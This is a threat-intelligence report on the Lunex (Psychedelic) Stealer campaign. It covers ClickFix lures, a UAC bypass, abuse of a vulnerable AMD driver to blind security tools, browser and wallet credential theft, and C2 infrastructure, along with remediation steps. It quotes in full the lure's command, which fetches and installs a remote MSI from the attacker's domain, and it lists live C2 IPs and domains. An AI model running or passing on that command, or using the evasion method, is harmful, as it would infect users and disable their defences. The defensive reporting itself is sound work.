Threat reportMalwareTL-2026-2664
Lunex Stealer Abuses Vulnerable AMD Radeon Driver (CVE-2023-20598) to Blind Security Monitoring and Steal Browser/Crypto Credentials
Lunex Stealer Abuses Vulnerable AMD Radeon Driver (TL-2026-2664), also tracked as Lunex, is a high-severity malware campaign scored CVSS 7.8, first published 2026-09-26 and last reviewed 2026-10-03. It is linked to a Russia-nexus actor with low confidence, affects Advanced Micro Devices, Inc. AMD Radeon Software (PDFWKRNL.sys, references 1 CVE (CVE-2023-20598), maps to 13 MITRE ATT&CK techniques (T1005, T1053.005, T1071.001), and is covered by 9 detection rules and 26 indicators of compromise.
- CVSS
- 7.8/10High
- CVEs
- 1Referenced vulnerabilities
- Techniques
- 13MITRE ATT&CK
- Actors
- 0Not attributed
- Detection rules
- 9SPL · KQL · Sigma
- IOCs
- 26Indicators of compromise
Key facts for TL-2026-2664
- Threat ID
- TL-2026-2664
- Also known as
- Lunex, Lunex Stealer, Psychedelic Stealer
- Severity
- HIGH
- CVSS
- 7.8 (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
- Status
- ACTIVE
- Category
- MALWARE
- First published
- Last reviewed
- Attribution confidence
- LOW
- Nation-state nexus
- Russia
- Motivation
- FINANCIAL
- Target sectors
- retail, health, consumer services, cryptocurrency
- Target regions
- ukraine, Europe, North America
- Detection rules
- 9
- Indicators of compromise
- 26
- Updates
- 2026-10-03
Malware and tooling in Lunex Stealer Abuses Vulnerable AMD Radeon Driver
Malware and tooling: Psychedelic Stealer, Lunex panel, LunexLoader
How Lunex Stealer Abuses Vulnerable AMD Radeon Driver works
Lunex, a malware-as-a-service platform, delivers the Psychedelic Stealer payload via LunexLoader in a four-stage ClickFix chain that exploits CVE-2023-20598 in the AMD Radeon PDFWKRNL.sys kernel driver to zero EDR/AV kernel callbacks without killing the processes, evading both HVCI and Microsoft's Vulnerable Driver Blocklist. It targets Ukrainian-speaking users via compromised legitimate websites, stealing credentials from seven Chromium browsers and nine cryptocurrency wallets and installing a PowerShell-backed browser Native Messaging Host for persistent remote filesystem access.
Lunex is a Russian-speaking-developed malware-as-a-service (MaaS) infostealer platform whose current campaign, first reverse-engineered end-to-end by Ontinue's Cyber Defence Centre (researcher Rhys Downing, published 2026-09-25), chains four stages against Ukrainian-speaking internet users. The chain begins with a fake Cloudflare CAPTCHA verification page injected via iframe into compromised, legitimate small-business websites (a hair-treatment clinic, a scale-model manufacturer, a bookstore/publisher, a psychological-services facility, a tool retailer, and an automotive/tool retailer). The lure uses the 'ClickFix' technique: it copies a `msiexec.exe /i https://uasputnik.com/elita.msi /passive` command to the victim's clipboard and instructs them, in Ukrainian, to paste it into the Windows Run dialog (Win+R) to 'complete verification.' Arctic Wolf Labs, who first documented this specific ClickFix wave as 'Psychedelic Stealer' (published 2026-09-24) before the AMD-driver/LunexLoader linkage was known, recorded 557 lure views, 426 CAPTCHA clicks, and 79 completed installs across 32 countries between September 9-14, 2026, with Ukraine accounting for 446 of the views.
The MSI (also seen as `miks.msi` and `sova.msi`) drops LunexLoader, which first escalates from a standard user context by abusing the CMSTPLUA COM object to bypass User Account Control (UAC), a well-known 'fileless' UAC-bypass technique that requires no additional binary drop. With elevated privileges, LunexLoader performs a Bring-Your-Own-Vulnerable-Driver (BYOVD) attack, loading PDFWKRNL.sys, an AMD Radeon Software kernel driver vulnerable to CVE-2023-20598 (CVSS 3.1: 7.8, CWE-269 Improper Privilege Management), which lets an authenticated caller issue an IOCTL request to obtain arbitrary physical-memory and I/O-port read/write. Rather than the common BYOVD pattern of terminating EDR/AV processes outright (which is loud and immediately alerts on the process crash), LunexLoader uses PDB-guided kernel callback zeroing: it locates and nulls the registered kernel-mode notify-routine callbacks (process/thread/image-load callbacks) that security products rely on for telemetry, leaving the security product's process running and appearing healthy while it receives no further telemetry. Ontinue's testing found that neither Hypervisor-Protected Code Integrity (HVCI) nor the current Microsoft Vulnerable Driver Blocklist stops this specific PDFWKRNL.sys variant from loading, despite its hash having been catalogued in the LOLDrivers project since March 2026, when ESET's 'EDR Killers' research (published 2026-03-19, tracking ~90 EDR-killer tools in the wild) first flagged the driver as actively abused for defense evasion.
With monitoring blinded, LunexLoader downloads and executes the Psychedelic Stealer payload (`psychedeliclove.exe`, a 64-bit Windows executable) from the same or a related staging host. The stealer harvests saved credentials, cookies, and autofill data from seven Chromium-based browsers (Chrome, Edge, Brave, Opera, Opera GX, Vivaldi, Yandex) and targets nine cryptocurrency wallets: five desktop wallets (Bitcoin Core, Litecoin Core, Exodus, Atomic Wallet, Electrum) and four browser-extension wallets (MetaMask, Trust Wallet, OKX Wallet, SafePal), identified and extracted by known extension IDs. For durable access beyond simple credential theft, it establishes three independent persistence/access mechanisms: a Registry Run key, a hidden scheduled task named `psychedelicloveUtils` that fires at logon, and a malicious Chrome Native Messaging Host registered as `com.lunex.explorer` (manifest `com.lunex.explorer.json`, bridged via `host.ps1`/`host.bat`). The Native Messaging Host implements a roughly 13,200-byte embedded PowerShell script that gives the operator a full remote-filesystem backdoor from inside the browser process: drive listing, directory enumeration, arbitrary file read in 512 KB chunks up to 524 MB, file write, file download, and arbitrary code execution — all without dropping an additional standalone C2 implant.
Stolen data and remote-control traffic are sent to Lunex's operator infrastructure over HTTP(S) via REST-style endpoints (`/api/v1/ext/passwords`, `/api/v1/ext/tokens`, `/api/v1/ext/wallets`, `/api/v1/checkin`, `/api/v1/agent/config`, `/api/v1/agent/tasks`). BlueTeamCoolTeam's OSINT into the operator side of Lunex (published 2026-06-13, updated 2026-06-14) found the panel platform deployed as early as May 14, 2026, growing to six confirmed operator panels across five countries by June 5, 2026, each running an identical React front-end (consistent build hashes and a shared favicon MD5 `b9251db3aa9511157cba432c0b5402fc` on nginx/1.27.5) on operator port 8000/TCP alongside a stealer-facing API on 8080/TCP. Panel capabilities extend beyond passive collection to active browser hijacking: forced navigation (`open_url`), fake browser notifications (`notify`), arbitrary JavaScript injection into victim tabs (`inject`), visual page spoofing (`spoof`), on-demand screenshots, and full live interactive remote-browser control sessions. One panel was fronted by Cloudflare behind a domain (`api-goo-drivehosting.com`) deliberately crafted to resemble routine Google Drive/API traffic in security logs. By the time of Ontinue's September 2026 analysis, Lunex's infrastructure had expanded to 28 unique panels across 13 countries (including Russia, the US, the UK, Netherlands, France, Germany, Turkey, and Bangladesh), with a Turkey-hosted panel additionally serving a set of unrelated consumer-phishing domains (impersonating Sam's Club, WhatsApp Business, Namshi, and others), indicating the same infrastructure is reused/resold for non-Lunex phishing as part of the MaaS offering. No formal threat-actor or group name has been attached to Lunex; attribution rests on panel-build and language artifacts pointing to a Russian-speaking developer or development team.
MITRE ATT&CK techniques used in TL-2026-2664
Collection
Persistence
T1053.005 Scheduled Task; T1547.001 Registry Run Keys / Startup Folder
Command and Control
T1071.001 Web Protocols; T1571 Non-Standard Port
Execution
T1204.004 Malicious Copy and Paste
stealth
Credential Access
T1539 Steal Web Session Cookie; T1555.003 Credentials from Web Browsers
Privilege Escalation
T1548.002 Bypass User Account Control
Resource Development
T1583.001 Domains; T1584.004 Server
defense-impairment
Affected products and versions in Lunex Stealer Abuses Vulnerable AMD Radeon Driver
- Advanced Micro Devices, Inc. — AMD Radeon Software (PDFWKRNL.sys kernel-mode driver)
Vulnerable versions: AMD Radeon Software releases bundling the pre-patch PDFWKRNL.sys driver (see AMD-SB-6009)
Fixed in: AMD Radeon Software releases with the patched PDFWKRNL.sys per AMD-SB-6009
Remediation for Lunex Stealer Abuses Vulnerable AMD Radeon Driver
Patches
- AMD Radeon Software update addressing CVE-2023-20598 per AMD Security Bulletin AMD-SB-6009
Immediate actions
- Apply the AMD Radeon Software driver update addressing CVE-2023-20598 (AMD-SB-6009) on all endpoints to remove the vulnerable PDFWKRNL.sys binary from disk
- Block execution/loading of the vulnerable PDFWKRNL.sys build via WDAC/driver-blocklist policy tuned beyond the default Microsoft Vulnerable Driver Blocklist, since it currently does not cover this variant
- Block the identified Lunex C2 IPs (193.178.159.128, 217.77.15.181, 64.188.74.159, 78.17.74.164, 45.151.106.252, 94.154.32.21, 107.175.82.242) and phishing/panel domains (uasputnik.com, api-goo-drivehosting.com, account-sams-club.com, teamwork-recover-password.com, namshi-uae.com, whatsappbusineses.com, ibraq-perfumes.com) at the network perimeter
- Force credential resets and revoke saved browser sessions/cookies on any host observed executing elita.msi/miks.msi/sova.msi or psychedeliclove.exe, and rotate any exposed cryptocurrency wallet keys
Workarounds
- Where the patched Radeon driver cannot be deployed immediately, block PDFWKRNL.sys by file hash/certificate via WDAC or driver-signing enforcement independent of HVCI
- Use AppLocker/WDAC to block msiexec.exe /passive installs sourced from non-managed/non-allowlisted URLs
Longer-term hardening
- Deploy EDR/XDR with kernel-callback integrity self-monitoring so silent BYOVD callback-zeroing is detected even when the agent process itself keeps running
- Restrict local administrator rights and alert on CMSTPLUA COM-object invocation patterns consistent with UAC bypass
- Enforce Group Policy allowlisting for Chrome/Chromium Native Messaging Host registration to prevent unauthorized manifests like com.lunex.explorer.json
- Run recurring user-awareness training against ClickFix-style 'paste this into Run' social-engineering lures, particularly for Ukrainian-language user populations
CVEs associated with Lunex Stealer Abuses Vulnerable AMD Radeon Driver
Weaknesses (CWE) in Lunex Stealer Abuses Vulnerable AMD Radeon Driver
Timeline of Lunex Stealer Abuses Vulnerable AMD Radeon Driver
- CVE-2023-20598, an improper-privilege-management flaw in the AMD Radeon PDFWKRNL.sys kernel driver, is publicly disclosed; AMD publishes remediation bulletin AMD-SB-6009.
- ESET's 'EDR Killers' research, tracking ~90 EDR-killer tools in the wild, documents PDFWKRNL.sys as an actively abused BYOVD driver for defense evasion.
- The vulnerable PDFWKRNL.sys hash is added to the LOLDrivers project catalog.
- The first known Lunex Stealer operator C2 panel is deployed, per BlueTeamCoolTeam OSINT.
- Six active Lunex operator panels are established across five countries (US, Finland, Germany/Ireland, Netherlands, Ukraine).
- BlueTeamCoolTeam researcher Luke Wilkinson publishes 'The Panel Behind the Prompt,' OSINT into the live Lunex C2 network.
- The domain uasputnik.com is registered (17:02:25 UTC) and later used to serve the ClickFix lure page and host the malicious MSI installer.
- First Psychedelic Stealer ClickFix lures are observed injected into compromised scale-model-manufacturer and bookstore/publisher websites.
- A ClickFix lure is observed injected into a Ukrainian hair-treatment clinic website.
- Last recorded DNS activity for uasputnik.com's 176.53.159.40 A-record, indicating the campaign's initial infrastructure wave winds down.
- Arctic Wolf Labs publishes 'The Psychedelic Stealer: When a CAPTCHA Becomes an Installer,' the first public documentation of this ClickFix wave and its campaign statistics.
- Ontinue's Cyber Defence Centre publishes the first public, in-depth binary analysis linking the ClickFix chain to LunexLoader, the CVE-2023-20598 BYOVD technique, and the Lunex MaaS platform.
- The Hacker News publicizes the combined Lunex Stealer / AMD-driver BYOVD findings, drawing widespread security-community attention.
Update history for TL-2026-2664
- 2026-10-03 — tweetfeed.live community intel: New TL_OSINT_Scan community intel: 1 newly-corroborated indicator(s), 2 community-related indicator(s).
Sources cited for Lunex Stealer Abuses Vulnerable AMD Radeon Driver
- Lunex Stealer Abuses AMD Driver to Disable Security Monitoring and Steal Browser Credentials
- Hacked Ukrainian Sites Serve Fake Cloudflare ClickFix Lures for Psychedelic Stealer
- The Psychedelic Stealer: When a CAPTCHA Becomes an Installer
- The Panel Behind the Prompt: OSINT into a Live Lunex Stealer Network
- AMD Radeon Graphics Kernel Driver Privilege Management Vulnerability (AMD-SB-6009)
- NVD - CVE-2023-20598
- LOLDrivers: PDFWKRNL.sys driver entry
- ESET Research: A deep dive into EDR killers - a cornerstone of modern ransomware operations
- ClickFix Campaign Abuses Trusted Websites to Deploy Psychedelic Stealer
- Lunex Stealer Abuses AMD Driver to Disable Security Monitoring and Steal Browser Credentials (technical mirror)
Detection coverage for TL-2026-2664
As of 2026-10-03, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-2664 across Splunk SPL, Microsoft KQL and Sigma, covering 26 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.
Community OSINT corroboration for TL-2026-2664
5 of this threat's indicators have also been reported by the open-source security community, which observed at least one of them before this report was published. Community sightings are unverified and are kept separate from Threadlinqs' curated indicators. Indicator values, reporters and campaign linkage are available to authenticated Red-tier users.